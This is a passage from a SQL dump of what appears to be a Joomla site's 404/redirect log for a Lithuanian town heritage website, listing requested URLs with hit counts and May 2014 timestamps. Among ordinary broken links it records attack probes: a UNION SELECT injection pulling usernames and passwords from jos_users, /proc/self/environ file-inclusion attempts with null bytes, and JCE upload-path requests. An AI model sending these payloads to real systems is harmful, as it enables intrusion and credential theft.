00:00:00'),(8,'http://infotytuvenai.lt/index.php/component/content/category/51-vienuolynas/vienuolynas','','','',24,0,'2014-05-05 15:36:29','0000-00-00 00:00:00'),(9,'http://infotytuvenai.lt/index.php/component/content/category/47-piligrimai/piligrimai','','','',33,0,'2014-05-05 15:38:39','0000-00-00 00:00:00'),(10,'http://infotytuvenai.lt/index.php/component/content/category/17-sample-data-article/demo/portfolio/2012','','','',23,0,'2014-05-05 15:38:53','0000-00-00 00:00:00'),(11,'http://infotytuvenai.lt/index.php/component/content/category/19-sample-data-article/demo/courses','','','',23,0,'2014-05-05 15:39:06','0000-00-00 00:00:00'),(12,'http://infotytuvenai.lt/index.php/component/content/category/16-sample-data-article/demo/portfolio/2011','','','',26,0,'2014-05-05 15:39:19','0000-00-00 00:00:00'),(13,'http://infotytuvenai.lt/index.php/component/content/category/8-sample-data-article/joomla','','','',33,0,'2014-05-05 15:39:33','0000-00-00 00:00:00'),(14,'http://infotytuvenai.lt/index.php/component/content/category/46-tytuvenai/apie-tytuvenus','','','',30,0,'2014-05-05 15:39:46','0000-00-00 00:00:00'),(15,'http://infotytuvenai.lt/index.php/component/content/category/10-sample-data-article/demo','','','',33,0,'2014-05-05 15:39:59','0000-00-00 00:00:00'),(16,'http://infotytuvenai.lt/index.php/component/content/category/18-sample-data-article/demo/portfolio/2013','','','',25,0,'2014-05-05 15:40:13','0000-00-00 00:00:00'),(17,'http://infotytuvenai.lt/index.php/component/content/category/41-apie-centra/projektai','','','',35,0,'2014-05-05 15:40:27','0000-00-00 00:00:00'),(18,'http://infotytuvenai.lt/index.php/component/content/category/15-sample-data-article/demo/portfolio/2010','','','',26,0,'2014-05-05 15:40:42','0000-00-00 00:00:00'),(19,'http://infotytuvenai.lt/index.php/component/content/category/images/stories/istatai.pdf','','','',6,0,'2014-05-05 15:46:02','0000-00-00 00:00:00'),(20,'http://infotytuvenai.lt/index.php/component/content/category/images/stories/veiklos_strategija.pdf','','','',7,0,'2014-05-05 15:46:03','0000-00-00 00:00:00'),(21,'http://infotytuvenai.lt/index.php/component/content/category/images/stories/veikla/veiklos_strategija.pdf','','','',7,0,'2014-05-05 15:46:04','0000-00-00 00:00:00'),(22,'http://infotytuvenai.lt/index.php/component/undefined/','','','',4,0,'2014-05-05 15:46:11','0000-00-00 00:00:00'),(23,'http://infotytuvenai.lt/index.php/component/content/category/images/stories/skaidres.pdf','','','',4,0,'2014-05-05 15:46:19','0000-00-00 00:00:00'),(24,'http://infotytuvenai.lt/index.php/component/content/category/images/stories/fr0512.pdf','','','',4,0,'2014-05-05 15:46:20','0000-00-00 00:00:00'),(25,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/1938.jpg','','','',1,0,'2014-05-05 15:46:26','0000-00-00 00:00:00'),(26,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_9788_resize.JPG','','','',1,0,'2014-05-05 15:46:35','0000-00-00 00:00:00'),(27,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_1475.JPG','','','',1,0,'2014-05-05 15:46:47','0000-00-00 00:00:00'),(28,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/akmenuke1.jpg','','','',1,0,'2014-05-05 15:46:59','0000-00-00 00:00:00'),(29,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_1412.jpg','','','',1,0,'2014-05-05 15:47:10','0000-00-00 00:00:00'),(30,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_1340.jpg','','','',1,0,'2014-05-05 15:47:22','0000-00-00 00:00:00'),(31,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_5755.jpg','','','',1,0,'2014-05-05 15:47:34','0000-00-00 00:00:00'),(32,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_1407.jpg','','','',1,0,'2014-05-05 15:47:46','0000-00-00 00:00:00'),(33,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/DSCF1669.JPG','','','',1,0,'2014-05-05 15:47:58','0000-00-00 00:00:00'),(34,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_5854.jpg','','','',1,0,'2014-05-05 15:48:09','0000-00-00 00:00:00'),(35,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_5893.jpg','','','',1,0,'2014-05-05 15:48:21','0000-00-00 00:00:00'),(36,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/_MG_3670.jpg','','','',1,0,'2014-05-05 15:48:33','0000-00-00 00:00:00'),(37,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/1rag.jpg','','','',1,0,'2014-05-05 15:48:45','0000-00-00 00:00:00'),(38,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_9651_resize.JPG','','','',1,0,'2014-05-05 15:48:56','0000-00-00 00:00:00'),(39,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_0554.jpg','','','',1,0,'2014-05-05 15:49:08','0000-00-00 00:00:00'),(40,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_1409.jpg','','','',1,0,'2014-05-05 15:49:20','0000-00-00 00:00:00'),(41,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_1476.JPG','','','',1,0,'2014-05-05 15:49:32','0000-00-00 00:00:00'),(42,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_1416.jpg','','','',1,0,'2014-05-05 15:49:43','0000-00-00 00:00:00'),(43,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_5626.jpg','','','',1,0,'2014-05-05 15:49:55','0000-00-00 00:00:00'),(44,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_5609.jpg','','','',1,0,'2014-05-05 15:50:07','0000-00-00 00:00:00'),(45,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_5832.jpg','','','',1,0,'2014-05-05 15:50:19','0000-00-00 00:00:00'),(46,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_1430.jpg','','','',1,0,'2014-05-05 15:50:30','0000-00-00 00:00:00'),(47,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_1406.jpg','','','',1,0,'2014-05-05 15:50:42','0000-00-00 00:00:00'),(48,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_1404.jpg','','','',1,0,'2014-05-05 15:50:54','0000-00-00 00:00:00'),(49,'http://infotytuvenai.lt/index.php/component/content/category/files/UserImages/IMG_1437.jpg','','','',1,0,'2014-05-05 15:51:06','0000-00-00 00:00:00'),(50,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/DSCF0101_1.JPG','','','',1,0,'2014-05-05 15:51:29','0000-00-00 00:00:00'),(51,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/2005_08_12_01_005.jpg','','','',1,0,'2014-05-05 15:51:41','0000-00-00 00:00:00'),(52,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/_MG_3496.jpg','','','',1,0,'2014-05-05 15:51:53','0000-00-00 00:00:00'),(53,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_5847.jpg','','','',1,0,'2014-05-05 15:52:16','0000-00-00 00:00:00'),(54,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_1437.jpg','','','',1,0,'2014-05-05 15:52:28','0000-00-00 00:00:00'),(55,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_5806.jpg','','','',1,0,'2014-05-05 15:52:40','0000-00-00 00:00:00'),(56,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/506_400x500_1_.jpg','','','',1,0,'2014-05-05 15:52:52','0000-00-00 00:00:00'),(57,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_1452.jpg','','','',1,0,'2014-05-05 15:53:03','0000-00-00 00:00:00'),(58,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/_MG_3601.jpg','','','',1,0,'2014-05-05 15:53:15','0000-00-00 00:00:00'),(59,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_5848_1.jpg','','','',1,0,'2014-05-05 15:53:27','0000-00-00 00:00:00'),(60,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_5842.jpg','','','',1,0,'2014-05-05 15:53:39','0000-00-00 00:00:00'),(61,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/1947.jpg','','','',1,0,'2014-05-05 15:53:51','0000-00-00 00:00:00'),(62,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/azuolu_slenis_1.jpg','','','',1,0,'2014-05-05 15:54:02','0000-00-00 00:00:00'),(63,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/DSCF0038.JPG','','','',1,0,'2014-05-05 15:54:14','0000-00-00 00:00:00'),(64,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_5629.jpg','','','',1,0,'2014-05-05 15:54:26','0000-00-00 00:00:00'),(65,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_1394.jpg','','','',1,0,'2014-05-05 15:54:38','0000-00-00 00:00:00'),(66,'http://infotytuvenai.lt/index.php/component/content/category/files/UserImages/IMG_1452.jpg','','','',1,0,'2014-05-05 15:54:50','0000-00-00 00:00:00'),(67,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_1455.jpg','','','',1,0,'2014-05-05 15:55:02','0000-00-00 00:00:00'),(68,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/3rag.jpg','','','',1,0,'2014-05-05 15:55:15','0000-00-00 00:00:00'),(69,'http://infotytuvenai.lt/index.php/component/content/category/images/tytuvenai/IMG_1322.jpg','','','',1,0,'2014-05-05 15:55:29','0000-00-00 00:00:00'),(70,'http://infotytuvenai.lt/index.php/undefined/white/loading.gif','','http://infotytuvenai.lt/index.php/apgyvendinimas','',2,0,'2014-05-08 07:00:24','0000-00-00 00:00:00'),(71,'http://www.tytuvenai.eu/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload','','','',213,0,'2014-05-08 07:19:56','0000-00-00 00:00:00'),(72,'http://www.tytuvenai.eu/index.php/component/content/?id=103&Itemid=82','','','',114,0,'2014-05-08 10:40:11','0000-00-00 00:00:00'),(73,'http://tytuvenai.eu/index.php?option=com_content&view=category&id=32&Itemid=74','','','',17,0,'2014-05-08 11:06:15','0000-00-00 00:00:00'),(74,'http://www.tytuvenai.eu/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b','','','',61,0,'2014-05-08 11:14:41','0000-00-00 00:00:00'),(75,'http://www.tytuvenai.eu/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20','','','',57,0,'2014-05-08 12:31:27','0000-00-00 00:00:00'),(76,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=97:pasirayta-finansavimo-sutartis-dl-tytuvn-banyios-ii-etapo-projekto-bei-projekto-rangos-darb-sutartis&tmpl=component&print=1&layout=default&page=','','','',2,0,'2014-05-08 13:49:14','0000-00-00 00:00:00'),(77,'http://www.tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53&limitstart=10','','','',8,0,'2014-05-08 14:21:53','0000-00-00 00:00:00'),(78,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=53:nelaime&catid=1:paskutinesnaujienos&Itemid=53','','','',37,0,'2014-05-08 15:07:53','0000-00-00 00:00:00'),(79,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=35&itemid=30','','','',31,0,'2014-05-08 16:20:38','0000-00-00 00:00:00'),(80,'http://www.tytuvenai.eu/index.php/using-joomla/extensions/components/users-component/registration-form','','','',1,0,'2014-05-08 17:19:33','0000-00-00 00:00:00'),(81,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=98:pildome-vaik-svajones&catid=1:paskutinesnaujienos&Itemid=53','','','',12,0,'2014-05-08 18:07:19','0000-00-00 00:00:00'),(82,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=35&Itemid=30','','','',65,0,'2014-05-08 19:59:06','0000-00-00 00:00:00'),(83,'http://tytuvenai.eu//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload&140508-164011','','','',1,0,'2014-05-08 23:41:27','0000-00-00 00:00:00'),(84,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=8','','','',22,0,'2014-05-09 13:42:25','0000-00-00 00:00:00'),(85,'http://www.tytuvenai.eu//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20','','','',6,0,'2014-05-09 15:44:19','0000-00-00 00:00:00'),(86,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=71&Itemid=71','','','',49,0,'2014-05-09 18:20:24','0000-00-00 00:00:00'),(87,'http://www.tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53&limitstart=21','','','',15,0,'2014-05-09 20:56:48','0000-00-00 00:00:00'),(88,'http://www.tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53','','','',97,0,'2014-05-09 22:25:41','0000-00-00 00:00:00'),(89,'http://tytuvenai.eu/index.php?option=com_tag&controller=tag&task=add&article_id=-260479/**//*!union*//**//*!select*//**/concat(username,0x3a,password,0x3a,usertype)/**//*!from*//**/jos_users/**/&tmpl=component','','','',8,0,'2014-05-10 00:47:13','0000-00-00 00:00:00'),(90,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=92:tsiasi-tytuvn-bernardin-vienuolyno-atstatymo-darbai&catid=1:paskutinesnaujienos&Itemid=53','','','',20,0,'2014-05-10 07:33:12','0000-00-00 00:00:00'),(91,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=86&Itemid=80','','','',48,0,'2014-05-10 08:00:15','0000-00-00 00:00:00'),(92,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=48&Itemid=62','','','',24,0,'2014-05-10 11:56:33','0000-00-00 00:00:00'),(93,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=52&Itemid=63','','','',17,0,'2014-05-10 11:56:38','0000-00-00 00:00:00'),(94,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=53&Itemid=55','','','',17,0,'2014-05-10 11:56:41','0000-00-00 00:00:00'),(95,'http://www.tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=97:pasirayta-finansavimo-sutartis-dl-tytuvn-banyios-ii-etapo-projekto-bei-projekto-rangos-darb-sutartis&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-10 14:06:26','0000-00-00 00:00:00'),(96,'http://tytuvenai.eu/index.php/component/content/?id=103&Itemid=82','','','',54,0,'2014-05-10 15:22:05','0000-00-00 00:00:00'),(97,'http://www.tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=32&Itemid=37','','','',17,0,'2014-05-10 15:54:02','0000-00-00 00:00:00'),(98,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=84:projektai&catid=41:veikla&Itemid=79','','','',17,0,'2014-05-10 18:27:43','0000-00-00 00:00:00'),(99,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=47&Itemid=65','','','',7,0,'2014-05-10 20:04:32','0000-00-00 00:00:00'),(100,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=100:tytuvn-banyios-ir-vienuolyno-ansamblis&tmpl=component&print=1&layout=default&page=','','','',2,0,'2014-05-10 20:39:13','0000-00-00 00:00:00'),(101,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=48&Itemid=62','','','',7,0,'2014-05-10 20:54:56','0000-00-00 00:00:00'),(102,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53&limitstart=4','','','',21,0,'2014-05-10 23:00:56','0000-00-00 00:00:00'),(103,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57','','','',5,0,'2014-05-11 01:06:56','0000-00-00 00:00:00'),(104,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53&limitstart=6','','','',17,0,'2014-05-11 01:50:08','0000-00-00 00:00:00'),(105,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=90:tytuvn-ansamblio-banyios-stogo-keitimo-darbai-pusjo&catid=1:paskutinesnaujienos&Itemid=53','','','',26,0,'2014-05-11 02:48:57','0000-00-00 00:00:00'),(106,'http://tytuvenai.eu//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20','','','',2,0,'2014-05-11 05:48:24','0000-00-00 00:00:00'),(107,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=48:jaunystei-prisiminti&catid=1:paskutinesnaujienos&Itemid=53','','','',41,0,'2014-05-11 09:07:59','0000-00-00 00:00:00'),(108,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=15','','','',22,0,'2014-05-11 11:12:58','0000-00-00 00:00:00'),(109,'http://www.tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=component&print=1&layout=default&page=','','','',2,0,'2014-05-11 13:25:53','0000-00-00 00:00:00'),(110,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=58:muziejaus-atidarymas&catid=44:renginiai','','','',13,0,'2014-05-11 17:57:41','0000-00-00 00:00:00'),(111,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=85:europos-paveldo-dienos-2013-qepoch-enklaiq&catid=1:paskutinesnaujienos&Itemid=53','','','',4,0,'2014-05-11 19:34:55','0000-00-00 00:00:00'),(112,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=86:veiklos-srategija&catid=41:veikla&Itemid=80','','','',11,0,'2014-05-11 22:54:58','0000-00-00 00:00:00'),(113,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=84&Itemid=79','','','',38,0,'2014-05-12 02:13:47','0000-00-00 00:00:00'),(114,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=47:skaitymai-kapinese&catid=1:paskutinesnaujienos&Itemid=53','','','',8,0,'2014-05-12 04:37:32','0000-00-00 00:00:00'),(115,'http://www.tytuvenai.eu/index.php?option=com_poll&id=15:kokios-informacijos-iekote','','','',4,0,'2014-05-12 07:30:02','0000-00-00 00:00:00'),(116,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=71:darbo-umokestis&catid=41:veikla&Itemid=71','','','',11,0,'2014-05-12 07:49:20','0000-00-00 00:00:00'),(117,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=91:kvieiame--darb-saugos-seminar&catid=1:paskutinesnaujienos&Itemid=53','','http://www.google.lt/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CDYQFjAB&url=http%3A%2F%2Fwww.tytuvenai.eu%2Findex.php%3Foption%3Dcom_content%26vie','',16,0,'2014-05-12 10:36:14','0000-00-00 00:00:00'),(118,'http://www.tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53&limitstart=14','','','',18,0,'2014-05-12 10:57:02','0000-00-00 00:00:00'),(119,'http://www.tytuvenai.eu/index.php?option=com_content&view=category&id=32&Itemid=74','','','',47,0,'2014-05-12 12:07:23','0000-00-00 00:00:00'),(120,'http://www.tytuvenai.eu/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1','','','',1,0,'2014-05-12 13:26:04','0000-00-00 00:00:00'),(121,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53','','','',32,0,'2014-05-12 14:26:24','0000-00-00 00:00:00'),(122,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=83:pradedame-prekiauti-suvenyrais-su-tytuvn-simbolika&catid=1:paskutinesnaujienos&Itemid=53','','','',25,0,'2014-05-12 14:29:53','0000-00-00 00:00:00'),(123,'http://www.tytuvenai.eu/index.php?option=com_content&view=category&id=32:turizmas&layout=blog&Itemid=37&layout=default','','','',17,0,'2014-05-12 16:43:19','0000-00-00 00:00:00'),(124,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=97:pasirayta-finansavimo-sutartis-dl-tytuvn-banyios-ii-etapo-projekto-bei-projekto-rangos-darb-sutartis&catid=1:paskutinesnaujienos&Itemid=53','','','',18,0,'2014-05-12 19:21:41','0000-00-00 00:00:00'),(125,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53&limitstart=2','','','',25,0,'2014-05-12 20:32:42','0000-00-00 00:00:00'),(126,'http://www.tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53&limitstart=12','','','',9,0,'2014-05-12 21:08:06','0000-00-00 00:00:00'),(127,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=17','','','',18,0,'2014-05-13 01:40:04','0000-00-00 00:00:00'),(128,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=3','','','',18,0,'2014-05-13 01:40:05','0000-00-00 00:00:00'),(129,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=4','','','',16,0,'2014-05-13 01:40:06','0000-00-00 00:00:00'),(130,'http://www.tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53&limitstart=28','','','',11,0,'2014-05-13 03:13:37','0000-00-00 00:00:00'),(131,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=6','','','',17,0,'2014-05-13 03:14:25','0000-00-00 00:00:00'),(132,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=55&Itemid=54','','','',19,0,'2014-05-13 03:27:19','0000-00-00 00:00:00'),(133,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&showall=1','','','',27,0,'2014-05-13 03:29:32','0000-00-00 00:00:00'),(134,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=16','','','',16,0,'2014-05-13 03:37:54','0000-00-00 00:00:00'),(135,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=2','','','',17,0,'2014-05-13 03:37:58','0000-00-00 00:00:00'),(136,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=5','','','',21,0,'2014-05-13 03:37:58','0000-00-00 00:00:00'),(137,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=7','','','',12,0,'2014-05-13 04:28:57','0000-00-00 00:00:00'),(138,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=54:dekojame-uz-aukas&catid=1:paskutinesnaujienos&Itemid=53','','','',27,0,'2014-05-13 04:42:33','0000-00-00 00:00:00'),(139,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=14','','','',15,0,'2014-05-13 04:42:38','0000-00-00 00:00:00'),(140,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=47&Itemid=65','','','',21,0,'2014-05-13 05:32:10','0000-00-00 00:00:00'),(141,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=53&Itemid=55','','','',8,0,'2014-05-13 09:30:51','0000-00-00 00:00:00'),(142,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=85:europos-paveldo-dienos-2013-qepoch-enklaiq&catid=1:paskutinesnaujienos&Itemid=53','','','',21,0,'2014-05-13 10:52:43','0000-00-00 00:00:00'),(143,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=53&Itemid=56','','','',5,0,'2014-05-13 10:58:13','0000-00-00 00:00:00'),(144,'http://www.tytuvenai.eu/index.php?view=article&catid=41:veikla&id=71:darbo-umokestis&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=71','','','',3,0,'2014-05-13 13:34:20','0000-00-00 00:00:00'),(145,'http://tytuvenai.eu/index.php/component/content/category/51-vienuolynas/vienuolynas','','','',27,0,'2014-05-13 16:11:23','0000-00-00 00:00:00'),(146,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=65','','','',13,0,'2014-05-13 18:50:04','0000-00-00 00:00:00'),(147,'http://www.tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',1,0,'2014-05-13 20:03:35','0000-00-00 00:00:00'),(148,'http://tytuvenai.eu/index.php/component/content/category/28-sample-data-article/demo/courses/images/stories/skaidres.pdf','','','',1,0,'2014-05-13 20:41:19','0000-00-00 00:00:00'),(149,'http://tytuvenai.eu/index.php/component/content/category/28-sample-data-article/demo/courses/images/stories/fr0512.pdf','','','',1,0,'2014-05-13 20:43:16','0000-00-00 00:00:00'),(150,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=84&Itemid=79','','','',29,0,'2014-05-14 01:09:05','0000-00-00 00:00:00'),(151,'http://tytuvenai.eu/index.php?view=article&catid=25:projektai&id=15:tytuvn-bendruomens-vaidmens-saugant-ir-naudojant-kultros-paveld-stiprinimas&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=50','','','',13,0,'2014-05-14 01:26:31','0000-00-00 00:00:00'),(152,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=32&Itemid=37','','','',20,0,'2014-05-14 01:51:42','0000-00-00 00:00:00'),(153,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53&limitstart=7','','','',14,0,'2014-05-14 03:28:40','0000-00-00 00:00:00'),(154,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53&limitstart=21','','','',14,0,'2014-05-14 06:58:08','0000-00-00 00:00:00'),(155,'http://tytuvenai.eu/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20','','','',30,0,'2014-05-14 11:13:19','0000-00-00 00:00:00'),(156,'http://tytuvenai.eu/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b','','','',37,0,'2014-05-14 11:13:19','0000-00-00 00:00:00'),(157,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53&limitstart=14','','','',13,0,'2014-05-14 11:13:20','0000-00-00 00:00:00'),(158,'http://www.tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53&limitstart=6','','','',7,0,'2014-05-14 14:12:19','0000-00-00 00:00:00'),(159,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53&limitstart=28','','','',14,0,'2014-05-14 21:13:02','0000-00-00 00:00:00'),(160,'http://www.tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53&limitstart=4','','','',7,0,'2014-05-14 22:41:58','0000-00-00 00:00:00'),(161,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53&limitstart=10','','','',10,0,'2014-05-14 23:14:35','0000-00-00 00:00:00'),(162,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=9','','','',19,0,'2014-05-15 09:45:02','0000-00-00 00:00:00'),(163,'http://www.tytuvenai.eu/index.php?option=com_content&view=category&id=32&Itemid=47','','','',8,0,'2014-05-15 10:05:20','0000-00-00 00:00:00'),(164,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=54:dekojame-uz-aukas&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=65','','','',10,0,'2014-05-16 07:04:16','0000-00-00 00:00:00'),(165,'http://www.tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53&limitstart=7','','','',11,0,'2014-05-16 14:59:10','0000-00-00 00:00:00'),(166,'http://tytuvenai.eu/index.php?view=article&catid=41:veikla&id=71:darbo-umokestis&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=71','','','',13,0,'2014-05-16 19:04:05','0000-00-00 00:00:00'),(167,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=54:dekojame-uz-aukas&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',11,0,'2014-05-16 21:20:11','0000-00-00 00:00:00'),(168,'http://tytuvenai.eu/index.php?option=/proc/self/environ&task=click&bid=11','','','',1,0,'2014-05-16 21:48:02','0000-00-00 00:00:00'),(169,'http://tytuvenai.eu/index.php?option=/proc/self/environ&view=article&id=95:kvieiame-rengin&catid=1:paskutinesnaujienos&Itemid=53','','','',1,0,'2014-05-16 21:48:02','0000-00-00 00:00:00'),(170,'http://tytuvenai.eu/index.php?option=/proc/self/environ&tmpl=component&link=3848b2ae3d0f80d389fa7980bf0b23128f51b256','','','',1,0,'2014-05-16 21:48:02','0000-00-00 00:00:00'),(171,'http://tytuvenai.eu/index.php?option=/proc/self/environ\0&task=click&bid=11','','','',1,0,'2014-05-16 21:48:03','0000-00-00 00:00:00'),(172,'http://tytuvenai.eu/index.php?option=/proc/self/environ\0&view=article&id=95:kvieiame-rengin&catid=1:paskutinesnaujienos&Itemid=53','','','',1,0,'2014-05-16 21:48:03','0000-00-00 